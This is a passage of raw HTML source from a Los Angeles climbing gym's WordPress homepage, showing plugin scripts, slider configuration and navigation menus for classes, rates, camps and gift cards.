href='https://rockreation-la.com/wp-content/plugins/calendarize-it/css/print.css' type='text/css' media='all' /> <link rel="stylesheet" type="text/css" href="https://rockreation-la.com/wp-content/plugins/smart-slider-3/library/media/smartslider.min.css?1554945115" media="all" /> <style type="text/css">.n2-ss-spinner-simple-white-container { position: absolute; top: 50%; left: 50%; margin: -20px; background: #fff; width: 20px; height: 20px; padding: 10px; border-radius: 50%; z-index: 1000; } .n2-ss-spinner-simple-white { outline: 1px solid RGBA(0,0,0,0); width:100%; height: 100%; } .n2-ss-spinner-simple-white:before { position: absolute; top: 50%; left: 50%; width: 20px; height: 20px; margin-top: -11px; margin-left: -11px; } .n2-ss-spinner-simple-white:not(:required):before { content: ''; border-radius: 50%; border-top: 2px solid #333; border-right: 2px solid transparent; animation: n2SimpleWhite .6s linear infinite; } @keyframes n2SimpleWhite { to {transform: rotate(360deg);} }</style><script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/core.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/widget.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/accordion.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/mouse.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/slider.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/resizable.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/draggable.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/button.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/position.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/dialog.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/tabs.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/sortable.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/droppable.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/datepicker.min.js'></script> <script type='text/javascript'> jQuery(document).ready(function(jQuery){jQuery.datepicker.setDefaults({"closeText":"Close","currentText":"Today","monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Previous","dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"dateFormat":"MM d, yy","firstDay":1,"isRTL":false});}); </script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/menu.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/wp-a11y.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."}; /* ]]> */ </script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/jquery/ui/autocomplete.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/calendarize-it/js/deprecated.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var RHC = {"ajaxurl":"https:\/\/rockreation-la.com\/","mobile_width":"480","last_modified":"86d87f4b7af537aefc6c242999ab8eaa","tooltip_details":[],"visibility_check":"1","gmt_offset":"0","disable_event_link":"0"}; /* ]]> */ </script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/calendarize-it/js/frontend.min.js'></script> <script type='text/javascript' src='https://maps.google.com/maps/api/js?libraries=places&#038;ver=3.0'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/uploads/calendarize-it/calendarize-it-accordion-widget/js/rhc_accordion_widget.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/calendarize-it/js/bootstrap.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/calendarize-it/js/bootstrap-select.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/calendarize-it/js/rhc_gmap3.js'></script> <link rel='https://api.w.org/' href='https://rockreation-la.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://rockreation-la.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://rockreation-la.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='https://rockreation-la.com/' /> <link rel="alternate" type="application/json+oembed" href="https://rockreation-la.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frockreation-la.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://rockreation-la.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frockreation-la.com%2F&#038;format=xml" /> <!--[if IE 9]><link rel="stylesheet" type="text/css" href="https://rockreation-la.com/wp-content/themes/vigor/css/ie9_stylesheet.css" media="screen"><![endif]--> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://rockreation-la.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1525644596461{padding-top: 10px !important;padding-bottom: 0px !important;background-color: #ffffff !important;}.vc_custom_1482370750914{background-color: #ffffff !important;}.vc_custom_1525644170990{padding-right: 0px !important;}.vc_custom_1525649359692{padding-top: 15px !important;padding-bottom: 10px !important;}.vc_custom_1454362224471{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/wp-spamshield/js/jscripts.php'></script> <meta property="og:title" content="Home" /> <meta property="og:description" content="" /> <script type="text/javascript">(function(){var N=this;N.N2_=N.N2_||{r:[],d:[]},N.N2R=N.N2R||function(){N.N2_.r.push(arguments)},N.N2D=N.N2D||function(){N.N2_.d.push(arguments)}}).call(window);if(!window.n2jQuery){window.n2jQuery={ready:function(cb){console.error('n2jQuery will be deprecated!');N2R(['$'],cb)}}}window.nextend={localization:{},ready:function(cb){console.error('nextend.ready will be deprecated!');N2R('documentReady',function($){cb.call(window,$)})}};nextend.fontsLoaded=false;nextend.fontsLoadedActive=function(){nextend.fontsLoaded=true};var requiredFonts=["Montserrat:n3","Montserrat:n4","Playfair Display:n3","Playfair Display:n4"],fontData={google:{families:["Montserrat:300,400","Playfair Display:300,400:latin"]},active:function(){nextend.fontsLoadedActive()},inactive:function(){nextend.fontsLoadedActive()},fontactive:function(f,s){fontData.resolveFont(f+':'+s)},fontinactive:function(f,s){fontData.resolveFont(f+':'+s)},resolveFont:function(n){for(var i=requiredFonts.length-1;i>=0;i--){if(requiredFonts[i]===n){requiredFonts.splice(i,1);break}}if(!requiredFonts.length)nextend.fontsLoadedActive()}};if(typeof WebFontConfig!=='undefined'&&typeof WebFont==='undefined'){var _WebFontConfig=WebFontConfig;for(var k in WebFontConfig){if(k=='active'){fontData.active=function(){nextend.fontsLoadedActive();_WebFontConfig.active()}}else if(k=='inactive'){fontData.inactive=function(){nextend.fontsLoadedActive();_WebFontConfig.inactive()}}else if(k=='fontactive'){fontData.fontactive=function(f,s){fontData.resolveFont(f+':'+s);_WebFontConfig.fontactive.apply(this,arguments)}}else if(k=='fontinactive'){fontData.fontinactive=function(f,s){fontData.resolveFont(f+':'+s);_WebFontConfig.fontinactive.apply(this,arguments)}}else if(k=='google'){if(typeof WebFontConfig.google.families!=='undefined'){for(var i=0;i<WebFontConfig.google.families.length;i++){fontData.google.families.push(WebFontConfig.google.families[i])}}}else{fontData[k]=WebFontConfig[k]}}}fontData.classes=true;fontData.events=true;if(typeof WebFont==='undefined'){window.WebFontConfig=fontData}else{WebFont.load(fontData)}</script><script type="text/javascript" src="https://rockreation-la.com/wp-content/plugins/smart-slider-3/nextend/media/dist/n2.min.js?1554945119"></script> <script type="text/javascript" src="https://rockreation-la.com/wp-content/plugins/smart-slider-3/nextend/media/dist/nextend-frontend.min.js?1554945119"></script> <script type="text/javascript" src="https://rockreation-la.com/wp-content/plugins/smart-slider-3/library/media/dist/smartslider-frontend.min.js?1554945115"></script> <script type="text/javascript" src="https://rockreation-la.com/wp-content/plugins/smart-slider-3/library/media/plugins/type/simple/simple/dist/smartslider-simple-type-frontend.min.js?1554945115"></script> <script type="text/javascript" src="https://rockreation-la.com/wp-content/plugins/smart-slider-3/nextend/media/dist/nextend-webfontloader.min.js?1554945119"></script> <script type="text/javascript">N2R('documentReady',function($){nextend.fontsDeferred=$.Deferred();if(nextend.fontsLoaded){nextend.fontsDeferred.resolve()}else{nextend.fontsLoadedActive=function(){nextend.fontsLoaded=true;nextend.fontsDeferred.resolve()};var intercalCounter=0;nextend.fontInterval=setInterval(function(){if(intercalCounter>3||document.documentElement.className.indexOf('wf-active')!==-1){nextend.fontsLoadedActive();clearInterval(nextend.fontInterval)}intercalCounter++},1000)}N2R(["nextend-frontend","smartslider-frontend","smartslider-simple-type-frontend"],function(){new N2Classes.SmartSliderSimple('#n2-ss-2',{"admin":false,"translate3d":1,"callbacks":"","background.video.mobile":1,"align":"normal","isDelayed":0,"load":{"fade":1,"scroll":0},"playWhenVisible":1,"playWhenVisibleAt":0.5,"responsive":{"desktop":1,"tablet":1,"mobile":1,"onResizeEnabled":true,"type":"fullwidth","downscale":1,"upscale":1,"minimumHeight":0,"maximumHeight":600,"maximumSlideWidth":10000,"maximumSlideWidthLandscape":10000,"maximumSlideWidthTablet":10000,"maximumSlideWidthTabletLandscape":10000,"maximumSlideWidthMobile":10000,"maximumSlideWidthMobileLandscape":10000,"maximumSlideWidthConstrainHeight":0,"forceFull":1,"forceFullOverflowX":"body","forceFullHorizontalSelector":"body","constrainRatio":1,"sliderHeightBasedOn":"real","decreaseSliderHeight":0,"focusUser":1,"focusAutoplay":0,"deviceModes":{"desktopPortrait":1,"desktopLandscape":0,"tabletPortrait":1,"tabletLandscape":0,"mobilePortrait":1,"mobileLandscape":0},"normalizedDeviceModes":{"unknownUnknown":["unknown","Unknown"],"desktopPortrait":["desktop","Portrait"],"desktopLandscape":["desktop","Portrait"],"tabletPortrait":["tablet","Portrait"],"tabletLandscape":["tablet","Portrait"],"mobilePortrait":["mobile","Portrait"],"mobileLandscape":["mobile","Portrait"]},"verticalRatioModifiers":{"unknownUnknown":1,"desktopPortrait":1,"desktopLandscape":1,"tabletPortrait":1,"tabletLandscape":1,"mobilePortrait":1,"mobileLandscape":1},"minimumFontSizes":{"desktopPortrait":4,"desktopLandscape":4,"tabletPortrait":4,"tabletLandscape":4,"mobilePortrait":4,"mobileLandscape":4},"ratioToDevice":{"Portrait":{"tablet":0.7,"mobile":0.5},"Landscape":{"tablet":0,"mobile":0}},"sliderWidthToDevice":{"desktopPortrait":1200,"desktopLandscape":1200,"tabletPortrait":840,"tabletLandscape":0,"mobilePortrait":600,"mobileLandscape":0},"basedOn":"combined","orientationMode":"width_and_height","overflowHiddenPage":0,"desktopPortraitScreenWidth":1200,"tabletPortraitScreenWidth":800,"mobilePortraitScreenWidth":440,"tabletLandscapeScreenWidth":800,"mobileLandscapeScreenWidth":440,"focus":{"offsetTop":"#wpadminbar","offsetBottom":""}},"controls":{"mousewheel":0,"touch":"horizontal","keyboard":1,"blockCarouselInteraction":1},"lazyLoad":0,"lazyLoadNeighbor":0,"blockrightclick":0,"maintainSession":0,"autoplay":{"enabled":1,"start":1,"duration":5000,"autoplayToSlide":-1,"autoplayToSlideIndex":-1,"allowReStart":0,"pause":{"click":0,"mouse":"0","mediaStarted":1},"resume":{"click":0,"mouse":0,"mediaEnded":1,"slidechanged":0}},"perspective":1500,"layerMode":{"playOnce":0,"playFirstLayer":1,"mode":"skippable","inAnimation":"mainInEnd"},"initCallbacks":["new N2Classes.FrontendItemYouTube(this, \"n2-ss-2item13\", {\"image\":\"https:\\\/\\\/i.ytimg.com\\\/vi\\\/8m1oomqqB4k\\\/maxresdefault.jpg\",\"start\":\"2\",\"volume\":\"1\",\"autoplay\":\"1\",\"controls\":\"1\",\"center\":\"0\",\"loop\":\"0\",\"reset\":0,\"related\":\"0\",\"code\":\"qesNtYIBDfs\",\"youtubeurl\":\"https:\\\/\\\/www.youtube.com\\\/watch?v=8m1oomqqB4k\",\"defaultimage\":\"maxresdefault\",\"modestbranding\":1,\"playbutton\":\"1\",\"scroll-pause\":\"partly-visible\",\"theme\":\"\",\"vq\":\"default\",\"playbuttonwidth\":\"48\",\"playbuttonheight\":\"48\",\"playbuttonimage\":\"\",\"query\":[],\"youtubecode\":\"8m1oomqqB4k\",\"end\":\"\",\"privacy-enhanced\":0}, 1);","N2D(\"SmartSliderWidgetArrowImage\",function(i,e){function s(e,s,t,h){this.slider=e,this.slider.started(i.proxy(this.start,this,s,t,h))}return s.prototype.start=function(e,s,t){return this.slider.sliderElement.data(\"arrow\")?!1:(this.slider.sliderElement.data(\"arrow\",this),this.deferred=i.Deferred(),this.slider.sliderElement.on(\"SliderDevice\",i.proxy(this.onDevice,this)).trigger(\"addWidget\",this.deferred),this.previous=i(\"#\"+this.slider.elementID+\"-arrow-previous\").on(\"click\",i.proxy(function(i){i.stopPropagation(),this.slider[n2const.rtl.previous]()},this)),this.previousResize=this.previous.find(\".n2-resize\"),0===this.previousResize.length&&(this.previousResize=this.previous),this.next=i(\"#\"+this.slider.elementID+\"-arrow-next\").on(\"click\",i.proxy(function(i){i.stopPropagation(),this.slider[n2const.rtl.next]()},this)),this.nextResize=this.next.find(\".n2-resize\"),0===this.nextResize.length&&(this.nextResize=this.next),this.desktopRatio=e,this.tabletRatio=s,this.mobileRatio=t,void i.when(this.previous.n2imagesLoaded(),this.next.n2imagesLoaded()).always(i.proxy(this.loaded,this)))},s.prototype.loaded=function(){this.previous.css(\"display\",\"inline-block\"),this.previousResize.css(\"display\",\"inline-block\"),this.previousWidth=this.previousResize.width(),this.previousHeight=this.previousResize.height(),this.previousResize.css(\"display\",\"\"),this.previous.css(\"display\",\"\"),this.next.css(\"display\",\"inline-block\"),this.nextResize.css(\"display\",\"inline-block\"),this.nextWidth=this.nextResize.width(),this.nextHeight=this.nextResize.height(),this.nextResize.css(\"display\",\"\"),this.next.css(\"display\",\"\"),this.previousResize.find(\"img\").css(\"width\",\"100%\"),this.nextResize.find(\"img\").css(\"width\",\"100%\"),this.onDevice(null,{device:this.slider.responsive.getDeviceMode()}),this.deferred.resolve()},s.prototype.onDevice=function(i,e){var s=1;switch(e.device){case\"tablet\":s=this.tabletRatio;break;case\"mobile\":s=this.mobileRatio;break;default:s=this.desktopRatio}this.previousResize.width(this.previousWidth*s),this.previousResize.height(this.previousHeight*s),this.nextResize.width(this.nextWidth*s),this.nextResize.height(this.nextHeight*s)},s});","new N2Classes.SmartSliderWidgetArrowImage(this, 1, 0.7, 0.5);","N2D(\"SmartSliderWidgetBulletTransition\",function(t,e){function i(e,i){this.slider=e,this.slider.started(t.proxy(this.start,this,i))}return i.prototype.start=function(e){if(this.slider.sliderElement.data(\"bullet\"))return!1;if(this.slider.sliderElement.data(\"bullet\",this),this.axis=\"horizontal\",this.offset=0,this.parameters=e,this.bar=this.slider.sliderElement.find(\".nextend-bullet-bar\"),this.event=\"universalclick\",\"mouseenter\"===this.parameters.action&&(this.event=\"universalenter\"),this.slider.sliderElement.on({slideCountChanged:t.proxy(this.onSlideCountChanged,this),sliderSwitchTo:t.proxy(this.onSlideSwitch,this)}),this.slider.firstSlideReady.done(t.proxy(this.onFirstSlideSet,this)),0===e.overlay){var i=!1;switch(e.area){case 1:i=\"Top\";break;case 12:i=\"Bottom\";break;case 5:i=\"Left\",this.axis=\"vertical\";break;case 8:i=\"Right\",this.axis=\"vertical\"}i&&(this.offset=parseFloat(this.bar.data(\"offset\")),this.slider.responsive.addStaticMargin(i,this))}},i.prototype.onFirstSlideSet=function(t){this.onSlideCountChanged(),this.$dots.eq(t.index).addClass(\"n2-active\")},i.prototype.onDotClick=function(e,i){this.slider.directionalChangeTo(e),t(i.target).blur()},i.prototype.onSlideSwitch=function(t,e){this.$dots.filter(\".n2-active\").removeClass(\"n2-active\"),this.$dots.eq(e).addClass(\"n2-active\")},i.prototype.isVisible=function(){return this.bar.is(\":visible\")},i.prototype.getSize=function(){return\"horizontal\"===this.axis?this.bar.height()+this.offset:this.bar.width()+this.offset},i.prototype.showThumbnail=function(e,i){var s=this.getThumbnail(e);NextendTween.to(s,.3,{opacity:1}),this.$dots.eq(e).one(\"universalleave.thumbnailleave\",t.proxy(this.hideThumbnail,this,e,s))},i.prototype.hideThumbnail=function(t,e,i){i.stopPropagation(),NextendTween.to(e,.3,{opacity:0,onComplete:function(){e.remove()}})},i.prototype.getThumbnail=function(e){var i=this.$dots.eq(e),s=this.slider.sliderElement.offset(),a=i.offset(),o=i.outerWidth(),r=i.outerHeight(),n=t(\"<div\/>\").append(t(\"<div\/>\").css({width:this.parameters.thumbnailWidth,height:this.parameters.thumbnailHeight,backgroundImage:'url(\"'+this.slider.slides[e].getThumbnail()+'\")'}).addClass(\"n2-ss-bullet-thumbnail\")).addClass(this.parameters.thumbnailStyle).addClass(\"n2-ss-bullet-thumbnail-container\").appendTo(this.slider.sliderElement);switch(this.parameters.thumbnailPosition){case\"right\":n.css({left:a.left-s.left+o,top:a.top-s.top+r\/2-n.outerHeight(!0)\/2});break;case\"left\":n.css({left:a.left-s.left-n.outerWidth(!0),top:a.top-s.top+r\/2-n.outerHeight(!0)\/2});break;case\"top\":n.css({left:a.left-s.left+o\/2-n.outerWidth(!0)\/2,top:a.top-s.top-n.outerHeight(!0)});break;case\"bottom\":n.css({left:a.left-s.left+o\/2-n.outerWidth(!0)\/2,top:a.top-s.top+r})}return i.data(\"thumbnail\",n),n},i.prototype.onSlideCountChanged=function(){this.bar.html(\"\");for(var e=0;e<this.slider.slides.length;e++){var i=this.slider.slides[e],s=t('<div class=\"n2-ow '+this.parameters.dotClasses+'\" tabindex=\"0\"><\/div>').on(this.event,t.proxy(this.onDotClick,this,e)).appendTo(this.bar);switch(this.parameters.mode){case\"numeric\":s.html(e+1);break;case\"title\":s.html(i.getTitle())}if(1===this.parameters.thumbnail){var a=i.getThumbnail();a&&s.on({universalenter:t.proxy(this.showThumbnail,this,e)},{leaveOnSecond:!0})}}this.$dots=this.bar.find(\">*\")},i});","new N2Classes.SmartSliderWidgetBulletTransition(this, {\"overlay\":0,\"area\":10,\"dotClasses\":\"n2-style-71f8992c8fa2aba15e7858625601a6fa-dot \",\"mode\":\"\",\"action\":\"click\",\"thumbnail\":1,\"thumbnailWidth\":120,\"thumbnailHeight\":81,\"thumbnailStyle\":\"n2-style-a80a1ff3b8ddafcea99c72dc3040a2b3-simple \",\"thumbnailPosition\":\"top\"});"],"allowBGImageAttachmentFixed":false,"bgAnimationsColor":"RGBA(51,51,51,1)","bgAnimations":0,"mainanimation":{"type":"horizontal","duration":800,"delay":0,"ease":"easeOutQuad","parallax":0,"shiftedBackgroundAnimation":0},"carousel":1,"dynamicHeight":0})})});</script></head> <body class="home page-template page-template-full_width page-template-full_width-php page page-id-20 edgt-core-1.2 et_bloom vigor-ver-2.3 vertical_menu_with_scroll smooth_scroll side_menu_slide_from_right wpb-js-composer js-comp-ver-5.7 vc_responsive"> <div class="ajax_loader"><div class="ajax_loader_1"><div class="pulse"></div></div></div> <section class="side_menu right"> <div class="side_menu_title"> <h5>Quick Links</h5> </div> <div class="close_side_menu_holder"><div class="close_side_menu_holder_inner"><a href="#" target="_self" class="close_side_menu"><span aria-hidden="true" class="icon_close"></span></a></div></div> <div id="nav_menu-4" class="widget widget_nav_menu posts_holder"><div class="menu-side_menu_use-container"><ul id="menu-side_menu_use" class="menu"><li id="menu-item-51818" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-51818"><a href="https://rockreation-la.com/gift-cards/">Gift Cards</a></li> <li id="menu-item-50942" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50942"><a href="https://rockreation-la.com/new-to-rockreation/">New to Rockreation?</a></li> <li id="menu-item-51060" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-51060"><a href="https://rockreation-la.com/online-waivers/">Online Waivers</a></li> <li id="menu-item-50945" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50945"><a href="https://rockreation-la.com/for-kids/">For Kids!</a></li> <li id="menu-item-51423" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-51423"><a href="https://rockreation-la.com/climb-camp/">Climb Camp</a></li> <li id="menu-item-50943" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50943"><a href="https://rockreation-la.com/job-postings/">Job Postings</a></li> <li id="menu-item-51104" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-51104"><a href="http://visitor.r20.constantcontact.com/manage/optin?v=001sBwXbNtx-Qcza0UgP-TXaVoG83M-GTpqCPR5c8Nt7q_6x-hQNnnxTF8EeV2y9pXE779Tvr_y-ZpcUBccmIueGO3wWNpVc1klAbu8AALyXi87yTlSKp0J6FWl2LF6EB1uVHvFblyKO8alOG_IEi7eCOSHkEgWO4izG1GoASY8R1TWdF7Bwobe3Q%3D%3D">Newsletter Sign-up</a></li> </ul></div></div><div id="text-9" class="widget widget_text posts_holder"> <div class="textwidget"><span class="edgt_icon_shade edgt_icon_shortcode font_awesome normal " style="margin: 0 20px 0 0;"><a href="https://www.facebook.com/RockreationLA?fref=ts" target="_blank" style="color: #565952;" ><i class="edgt_icon_font_awesome fa fa-facebook " style="font-size: 17px;color: #565952;line-height:19px; " data-hover-color="#94907b" ></i></a></span><span class="edgt_icon_shade edgt_icon_shortcode font_awesome normal " style="margin: 0 0 0 0;"><a href="https://instagram.com/rockreation/" target="_blank" style="color: #565952;" ><i class="edgt_icon_font_awesome fa fa-instagram " style="font-size: 17px;color: #565952;line-height:19px; " data-hover-color="#94907b" ></i></a></span> <br> <br></div> </div><div id="nav_menu-6" class="widget widget_nav_menu posts_holder"><h4>Not Looking for Los Angeles?</h4><div class="menu-more-links-container"><ul id="menu-more-links" class="menu"><li id="menu-item-51326" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-51326"><a href="http://www.rockreation-cm.com/">Rockreation &#8211; COSTA MESA</a></li> <li id="menu-item-51327" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-51327"><a href="http://climbrefuge.com/">Climbing REFUGE Las Vegas</a></li> </ul></div></div> </section> <div class="wrapper"> <div class="wrapper_inner"> <header class="page_header scrolled_not_transparent has_top scroll_header_top_area centered_logo dark fixed"> <div class="header_inner clearfix"> <div class="header_top_bottom_holder"> <div class="header_top clearfix" > <div class="container"> <div class="container_inner clearfix" > <div class="left"> <div class="inner"> </div> </div> <div class="right"> <div class="inner"> </div> </div> </div> </div> </div> <div class="header_bottom header_in_grid clearfix " > <div class="container"> <div class="container_inner clearfix" > <div class="header_inner_left"> <div class="mobile_menu_button"> <span> <i class="edgt_icon_font_awesome fa fa-bars " ></i> </span> </div> <div class="logo_wrapper" > <div class="edgt_logo"><a href="https://rockreation-la.com/"><img class="normal" src="https://rockreation-la.com/wp-content/uploads/2016/09/LA_HANDwLETTERS_Black-01.png" alt="Logo"/><img class="light" src="https://rockreation-la.com/wp-content/themes/vigor/img/logo.png" alt="Logo"/><img class="dark" src="https://rockreation-la.com/wp-content/uploads/2016/09/LA_HANDwLETTERS_Black-01.png" alt="Logo"/><img class="sticky" src="https://rockreation-la.com/wp-content/themes/vigor/img/logo_black.png" alt="Logo"/><img class="mobile" src="https://rockreation-la.com/wp-content/uploads/2016/02/LA_LETTERSrockreation_Blacklogo.png" alt="Logo"/></a></div> </div> </div> <nav class="main_menu drop_down slide_from_top"> <ul id="menu-main_menu" class=""><li id="nav-menu-item-50497" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-20 current_page_item active narrow"><a href="https://rockreation-la.com/" class=" current "><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Home</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-50596" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children has_sub narrow"><a href="https://rockreation-la.com/about/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">About</span></span><span class="plus"></span></a> <div class="second"><div class="inner"><ul> <li id="nav-menu-item-50621" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/new-to-rockreation/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">New to Rockreation?</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-51456" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/facilities/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Facilities</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-50598" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/gallery/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Gallery</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-50623" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/job-postings/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Job Postings</span></span><span class="plus"></span></a></li> </ul></div></div> </li> <li id="nav-menu-item-50617" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children has_sub narrow"><a href="https://rockreation-la.com/rates/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Rates</span></span><span class="plus"></span></a> <div class="second"><div class="inner"><ul> <li id="nav-menu-item-51820" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/gift-cards/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Gift Cards</span></span><span class="plus"></span></a></li> </ul></div></div> </li> <li id="nav-menu-item-50626" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children has_sub narrow"><a href="https://rockreation-la.com/programs/" class=" no_link" style="cursor: default;" onclick="JavaScript: return false;"><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Programs</span></span><span class="plus"></span></a> <div class="second"><div class="inner"><ul> <li id="nav-menu-item-50630" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/climbing-classes/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Climbing Classes</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-50633" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/fitness-classes/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Fitness Classes</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-50638" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/yoga/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Yoga Classes</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-50637" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/for-kids/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">For Kids!</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-52144" class="menu-item menu-item-type-custom menu-item-object-custom "><a target="_blank" href="http://rockreation.com/rockwarriors/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Rock Warriors &#038; Youth Teams</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-50643" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/team-building-corporate/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Team Building + Corporate</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-50647" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/birthdayparties/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Birthday Parties</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-51463" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/climb-camp/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Climb Camp</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-52062" class="menu-item menu-item-type-custom menu-item-object-custom "><a href="https://diettogo.com/pricing?coupon=ROCKREATION20&amp;PUL=1367" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i 